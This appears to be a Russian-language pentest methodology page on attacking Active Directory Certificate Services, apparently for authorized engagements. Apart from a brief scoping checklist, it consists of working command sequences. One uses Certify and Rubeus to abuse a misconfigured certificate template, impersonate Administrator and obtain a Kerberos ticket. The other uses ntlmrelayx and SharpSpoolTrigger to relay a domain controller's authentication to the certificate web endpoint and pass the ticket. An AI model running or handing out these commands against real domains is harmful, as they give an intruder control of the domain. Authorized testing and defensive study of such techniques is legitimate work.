Сертификаты
:::tip Формат страницы
Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.
:::
Порядок действий
- Зафиксируйте роль в домене и допустимые техники (read‑only / согласованная эксплуатация).
- Соберите данные для картирования атаки (учётки, делегирование, доверия).
- Двигайтесь по сценариям раздела с планом отката и контролем DC.
- Команды и инструменты в блоках кода — на английском.
Методика
Misconfigured Certificate Templates
.\Certify.exe find /vulnerable
.\Certify.exe request /ca:<PREVIOUSLY_OBTAINED_CA> /template:<VULNERABLE_TEMPLATE_NAME> /altname:<USER_TO_IMPERSONATE>
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
cat cert.pfx | base64 -w 0
.\Rubeus.exe asktgt /user:Administrator /nowrap /password:<EXPORTING_PASSWORD> /certificate:<BASE64>
NTLM Relaying to ADCS HTTP Endpoints
sudo proxychains ntlmrelayx.py -t https://<ADCS>/certsrv/certfnsh.asp -smb2support --adcs --no-http-server
.\SharpSpoolTrigger.exe <TARGET_DC> <ATTACKER_MACHINE>
.\Rubeus.exe asktgt /user:<HOSTNAME>$ /ptt /certificate:<NTLM_CERTICIFATE>